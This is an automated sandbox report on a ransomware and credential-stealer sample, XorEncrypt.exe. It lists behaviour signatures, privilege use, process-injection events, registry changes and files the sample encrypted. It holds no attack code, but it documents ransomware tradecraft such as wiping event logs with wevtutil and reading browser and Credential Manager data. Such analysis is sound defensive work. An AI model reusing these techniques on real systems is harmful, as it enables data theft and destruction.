Malware Analysis Report

2024-12-07 17:21

Sample ID 241112-pypgfashjp
Target XorEncrypt.exe
SHA256 f1f72dc070609ea57ed4e3e07fab2de6770f9bcae6b85ec395184f9fe2cb2cb7
Tags
credential_access discovery evasion persistence ransomware spyware stealer
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

f1f72dc070609ea57ed4e3e07fab2de6770f9bcae6b85ec395184f9fe2cb2cb7

Threat Level: Likely malicious

The file XorEncrypt.exe was found to be: Likely malicious.

Malicious Activity Summary

credential_access discovery evasion persistence ransomware spyware stealer

Clears Windows event logs

Credentials from Password Stores: Windows Credential Manager

Deletes itself

Reads user/profile data of web browsers

Power Settings

Drops file in Program Files directory

Browser Information Discovery

Unsigned PE

System Time Discovery

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

Modifies registry class

Modifies Internet Explorer settings

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Runs net.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 12:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 12:44

Reported

2024-11-12 12:46

Platform

win7-20240903-en

Max time kernel

89s

Max time network

90s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe"

Signatures

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Asia\Beirut.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\index.html.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\cpu.html.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bg.pak.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Asia\Hebron.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows NT\TableTextService\ja-JP\TableTextService.dll.mui.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\RSSFeeds.js.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\css\settings.css.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\America\Nipigon.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw32.jpg.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\DVD Maker\Eurosti.TTF.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\7-Zip\Lang\ar.txt.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\manifest.json.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\vk_swiftshader.dll.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Journal\jnwppr.dll.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_rest.png.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\10.png.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\codec\libfluidsynth_plugin.dll.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask.wmv.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\ChkrRes.dll.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\codec\libd3d11va_plugin.dll.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\spu\libmarq_plugin.dll.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Media Player\es-ES\wmpnssci.dll.mui.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\currency.html.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\DVD Maker\fr-FR\OmdProject.dll.mui.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\flyout.html.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png.key-YEEISFLSETDV.0xcf41769d063c9 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A

Browser Information Discovery

discovery

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.0xcf41769d063c9\DefaultIcon C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.0xcf41769d063c9 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.0xcf41769d063c9\DefaultIcon\ = "C:\\Windows\\System32\\SHELL32.dll,47" C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2716 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2640 wrote to memory of 372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2640 wrote to memory of 372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2716 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2740 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2740 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2740 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2760 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2760 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2760 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2716 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2908 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2908 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2908 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2688 wrote to memory of 2900 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2688 wrote to memory of 2900 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2688 wrote to memory of 2900 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2716 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2668 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2668 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2668 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2400 wrote to memory of 2896 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2400 wrote to memory of 2896 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2400 wrote to memory of 2896 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2716 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2796 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2796 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2796 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2664 wrote to memory of 2768 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2664 wrote to memory of 2768 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2664 wrote to memory of 2768 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
